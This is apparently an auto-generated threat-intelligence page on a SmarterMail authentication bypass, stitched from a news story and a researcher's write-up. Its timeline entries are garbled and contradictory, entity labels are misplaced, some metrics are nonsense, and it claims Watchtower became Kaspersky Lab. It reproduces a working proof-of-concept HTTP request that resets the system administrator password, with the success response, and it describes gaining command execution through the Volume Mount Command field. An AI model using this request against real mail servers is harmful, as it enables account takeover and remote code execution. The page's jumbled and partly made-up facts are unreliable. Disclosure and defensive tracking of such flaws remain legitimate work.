INSPECTING ARCHIVED INTELLIGENCE (OUTDATED VERSION).
SmarterMail Auth Bypass Exploited in Patch Release
2026-01-22 09:46 | HIGH
Executive Summary (AI-generated)
The latest incident in the world of cybersecurity reveals a previously undisclosed vulnerability in SmarterMail, an email software developed by SmarterTools. This flaw allows attackers to bypass authentication and execute remote code on vulnerable systems, with the potential for widespread exploitation. The issue was first disclosed just days after a patch release, highlighting the importance of timely updates. As the company notes, users must update their versions as soon as possible to prevent falling victim to this critical security breach.
Technical Mitigations AI-generated
* Implement a more robust authentication mechanism, such as multi-factor authentication or token-based authentication, to prevent attackers from bypassing the security flaw.
* Regularly update and patch software components, including SmarterMail, to ensure that known vulnerabilities are addressed before they can be exploited by attackers.
* Provide clear documentation and release notes for new features and patches, including explanations of what issues were addressed and how users should use them safely.
* Consider implementing a "deny-all-privileges" approach, where administrators have limited privileges but cannot reset passwords or access sensitive data without proper authorization.
Technical Observables
Intelligence Metadata
Actors / Malware / CVEs / Campaigns
CVE-2025-52691
CVE-2026-23760
Target & Sectors
SG
government
Incident Timeline
January 8, 2026
Threat actors exploited a vulnerability in SmarterMail (reported as "SmarterMail Auth Bypass Exploited in the Wild Two Days After Patch Release") by navigating to the Settings page, creating a new volume and supplying an arbitrary command.
organisation
SmarterTools
It was patched by SmarterTools on January 15, 2026, with Build 9511, following responsible disclosure by the exposure management platform on January 8, 2026.
infrastructure
Smartermail
It has been described as an authentication bypass flaw that could allow any user to reset the SmarterMail system administrator password by means of a specially crafted HTTP request to the "/api/v1/auth/force-reset-password" endpoint.
The problem is rooted in the function "SmarterMail.Web.
organisation
AuthenticationController
AuthenticationController.ForceResetPassword," which not only allows the endpoint to be reached without authentication, but also leverages the fact that the reset request is accompanied by a boolean flag named "IsSysAdmin" to handle the incoming request depending on whether the user is a system administrator or not.
organisation
the Volume Mount Command
This can be accomplished by navigating to the Settings page, creating a new volume, and supplying an arbitrary command in the Volume Mount Command field that gets subsequently executed by the host's operating system.
8th January 2026
Threat actors exploited the SmarterMail Auth Bypass vulnerability in WT-2026.
organisation
Detail
Date
Detail
8th January 2026
WT-2026-0001 vulnerability discovered and reported to the vendor.
2026-01-09
Threat actors exploited a vulnerability in SmarterMail Auth, which was patched by the SmarterTool teams within six days of its release on January 15, 2026.
organisation
SmarterTool
We believe (and have validated, so it’s not a belief really, but still, sounds nice) that this vulnerability was patched relatively quickly by the SmarterTool teams post reporting, with a patched version released on the January 15, 2026 (release 9511) - 6 days ago.
13th January 2026
Threat actors exploited a previously unknown vulnerability in SmarterMail Auth, which was patched two days after the exploit occurred.
January 15, 2026
SmarterMail's SmarterTools released a patch for CVE-2025-52691 on January 15, 2026.
organisation
The Hacker News
When reached for comment, SmarterTools told The Hacker News that it released a fix for the vulnerability on January 15, 2026, adding it sent out notifications to all customers, asking them to update to the latest version.
infrastructure
Smartermail
The development comes less than a month after the Cyber Security Agency of Singapore (CSA) disclosed details of a maximum-severity security flaw in SmarterMail (CVE-2025-52691, CVSS score: 10.0) that could be exploited to achieve remote code execution.
The cybersecurity company also said CVE-2025-52691 has come under mass exploitation, making it essential that users of SmarterMail update to the latest version as soon as possible.
"Given the severity of this vulnerability, active exploitation, and exploitation of the additional CVE-2025-52691 being observed in the wild, businesses should prioritize the deployment of SmarterMail updates and review any outdated systems for signs of infection," it added.
"At the time of that release, we did notify all SmarterMail customers that a new version was released that fixed a critical security issue, and we strongly urged them to upgrade," Derek Curtis, chief operating officer at SmarterTools, said.
"As we don't manage installations ourselves – our SmarterMail software is on-premises – we have to rely on customers to read our notifications, then upgrade as soon as they feel it's prudent to do so.
organisation
CVE-2026-23760
Update
The vulnerability has been assigned the CVE identifier CVE-2026-23760 (CVSS score: 9.3), with Huntress noting that it has observed in-the-wild exploitation of the privileged account takeover vulnerability that could result in remote code execution.
organisation
IP
Minton also stated that all the IP addresses attempting to exploit CVE-2026-23760 are tied to virtual infrastructure in the U.S., and that the exact origin of the attacks is unknown.
January 15, 2026
Threat actors exploited a vulnerability in SmarterMail Auth, which was patched by the SmarterTool teams within six days of its release.
15th January 2026
Threat actors exploited a previously unknown vulnerability in SmarterMail Auth, which was patched two days later.
2026-01-16
Threat actors exploited a vulnerability in SmarterMail Auth, which was patched by the SmarterTool teams within six days of its release.
January 17, 2026
Threat actors exploited a vulnerability in SmarterMail Auth Bypass to gain unauthorized access within two days of the patch release.
organisation
the SmarterTools Community Portal
The cybersecurity company said it chose to make the finding public following a post on the SmarterTools Community Portal, where a user claimed that they lost access to their admin account, with the logs indicating the use of the same "force-reset-password" endpoint to change the password on January 17, 2026, two days after the release of the patch.
infrastructure
Smartermail
To make matters worse, it doesn't help that SmarterMail's release notes are vague and do not explicitly mention what issues were addressed.
organisation
CVE
In response, SmarterTools CEO Tim Uzzanti hinted that this is done so to avoid giving threat actors more ammunition, but noted they plan to send an email every time a new CVE is discovered and again when a build has been released to resolve the issue.
17th January 2026
Threat actors exploited a previously unknown vulnerability in SmarterMail Auth, which was patched two days after the discovery.
21st January 2026
Watchtower (now known as Kaspersky Lab) received an anonymous tip about SmarterMail Auth Bypass Exploited in the Wild two days after its patch release.
WT-2026-0001
Threat actors exploited a previously patched SmarterMail authentication bypass vulnerability in the wild two days after its patch release.
infrastructure
Smartermail
This same reader was kind enough to point us to a seemingly related SmarterMail forum thread, where a user is claiming that they cannot access their admin account anymore and provided log file excerpts of potentially related and suspicious behaviour:
force-reset-password immediately stood out to us - as we’ll show later, this is the exact endpoint implicated in WT-2026-0001.
We decided to continue poking at what looked like a fairly interesting solution and quickly stumbled into WT-2026-0001 - an Authentication Bypass vulnerability, allowing any user to reset the SmarterMail system administrator password.
SmarterMail forum post mentions a successful ITW attempt to exploit WT-2026-0001.
2026-01-22
The attackers exploited the Authentication Bypass vulnerability in SmarterMail by using it to reset administrator passwords.
organisation
WT-2026-0001
Together, friends, we have learned this the hard way today with WT-2026-0001.
infrastructure
Smartermail
You may recall that merely two weeks ago, we analyzed CVE-2025-52691 - a pre-auth RCE vulnerability in the SmarterTools SmarterMail email solution with a timeline that is typically reserved for KEV hall-of-famers.
SmarterMail Auth Bypass Exploited in the Wild Two Days After Patch Release.
A new security flaw in SmarterTools SmarterMail email software has come under active exploitation in the wild, two days after the release of a patch.
Wednesdays are meme days - but that changed when an anonymous reader reached out to us with a tip - somebody is currently exploiting SmarterMail and resetting admin passwords.
Attackers With Decompilers Strike Again (SmarterTools SmarterMail WT-2026-0001 Auth Bypass).
As a result, the
SmarterMail.Web.Api.
SmarterMail exposes built-in functionality that allows a system administrator to execute operating system commands.
SmarterMail acknowledges the receipt of advisory.
organisation
AuthenticationController
AuthenticationController.ForceResetPassword method immediately drew our attention:
organisation
CVE
At the time of writing, we are unaware of any CVE assigned to this vulnerability.
organisation
WT-2026-0001 - Authentication Bypass
Gasp.
WT-2026-0001 - Authentication Bypass via Password Reset
Bluntly, our plan when we began hunting for the fire behind some smoke was simple - review unauthenticated endpoints, pray for easy wins.
organisation
API
At [1], the force-reset-password API endpoint is defined.
organisation
PoC
Nope, no signs of a PoC dropped by a dog with 3 eyes.
organisation
TikTok
What about TikTok?
organisation
WarThunder
The WarThunder forums, perhaps?
organisation
ActionResult
[Description("This function will attempt to reset a user's password and should only be called after a user attempts to login and they receive a ChangePasswordNeeded = true.")]
public ActionResult<ResetPasswordResult> ForceResetPassword([FromBody] ForceResetPasswordInputs inputs)
{
ActionResult<ResetPasswordResult> result;
try
{
ActionResult<ResetPasswordResult> actionResult = base.
organisation
ReturnResult
ReturnResult<ResetPasswordResult>(delegate()
{
AuthenticationService instance = AuthenticationService.Instance;
ForceResetPasswordInputs inputs2 = inputs;
IPAddress clientIPAddress = this.
organisation
HttpContext
HttpContext.
organisation
clientIPAddress
ForcePasswordReset(inputs2, (clientIPAddress != null) ?
organisation
OldPassword
It has several interesting properties that can be controlled by the user:
IsSysAdmin
Username
OldPassword
NewPassword
ConfirmPassword
That combination is immediately unusual.
organisation
Password
Password reset flows typically rely on a second factor or out-of-band proof of control - for example, a secret token delivered via email.
organisation
DebugInfo
DebugInfo = "check1" + Environment.
organisation
IsSysAdmin
if (inputs.IsSysAdmin)
{
ResetPasswordResult resetPasswordResult4 = resetPasswordResult;
resetPasswordResult4.DebugInfo = resetPasswordResult4.DebugInfo + "check4.2" + Environment.
organisation
SystemRepository
NewLine;
db_system_administrator_readonly db_system_administrator_readonly = SystemRepository.
organisation
BadRequest
BadRequest;
return resetPasswordResult;
}
PasswordStrength.
organisation
ErrorCode
ErrorCode = requirementCodes.
organisation
DateTime
Add(db_system_administrator_readonly.password_hash, DateTime.
organisation
UtcNow
UtcNow);
db_system_administrator item = new db_system_administrator
{
guid = db_system_administrator_readonly.guid,
Password = inputs.
organisation
NewLine
NewLine;
try
{
SystemRepository.
organisation
Username
NewLine;
}
else
{
ResetPasswordResult resetPasswordResult9 = resetPasswordResult;
//...
}
//...
}
//...
}
At [1], the code takes the Username argument from attacker’s JSON and it retrieves its configuration.
organisation
Content-Length
Proof of Concept
The PoC is as simple as this:
POST /api/v1/auth/force-reset-password HTTP/1.1
Host: xxxxxxx:9998
Content-Type: application/json
Content-Length: 145
{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"NewPassword123!@#",
"ConfirmPassword": "NewPassword123!@#"}
You should receive the following response, which confirms that the password has been successfully modified:
{
"username":"",
"errorCode":"",
"errorData":"",
"debugInfo":"check1\\r\\ncheck2\\r\\ncheck3\\r\\ncheck4.2\\r\\ncheck5.2\\r\\ncheck6.2\\r\\ncheck7.2\\r\\ncheck8.2\\r\\n",
"success":true,
"resultCode":200
}
The only remaining requirement is knowing the username of the administrator account.
organisation
Volume Mount Command
Supply an arbitrary command in the Volume Mount Command field.
January 27, 2026
SmarterMail Auth Bypass Exploited in the Wild Two Days After Patch Release.
February 16, 2026
Threat actors exploited vulnerabilities in SmarterMail to target the Federal Civilian Executive Branch.
infrastructure
Smartermail
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added both the SmarterMail flaws to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by February 16, 2026.
Tactical Metrics
Metrics
infrastructure
Smartermail
Affected Product
Intelligence Sources
The Hacker News
2026-01-22
Zero Day Fans
2026-01-22
Tactical Intelligence
Incident Version History
CURRENT VERSION
Last Updated: 2026-04-27T06:29
Comprehensive Tactical Telemetry
Highly Correlated Entities
51x
organisation
Identified Entity
the Cyber Security Agency
entity
16x
timeline
Temporal Reference
January 15, 2026
date
8x
attribution
Attributing Entity
The U.S. Cybersecurity and Infrastructure Security Agency
authority
2x
vulnerability
Exploited CVE
CVE-2025-52691
cve
Contextual Telemetry
Context Block
12 METRICS
target region
Target Country
Singapore
country
infrastructure
Affected Product
Smartermail
software
tactic
Cyber Operation Type
Remote Code Execution
tactic
infrastructure
Software Version
9.3
version
general metric
Score
9
score
tactic
MITRE ATT&CK Technique
T1588.006 - Vulnerabilities
technique
source region
Origin Country
United States
country
industry
Targeted Sector
Government
sector
general metric
Attackers
1
attackers
general metric
Eyes
3
eyes
general metric
Xxxxxxx:9998 Content Type
145
xxxxxxx:9998 content type
general metric
Entities
2
entities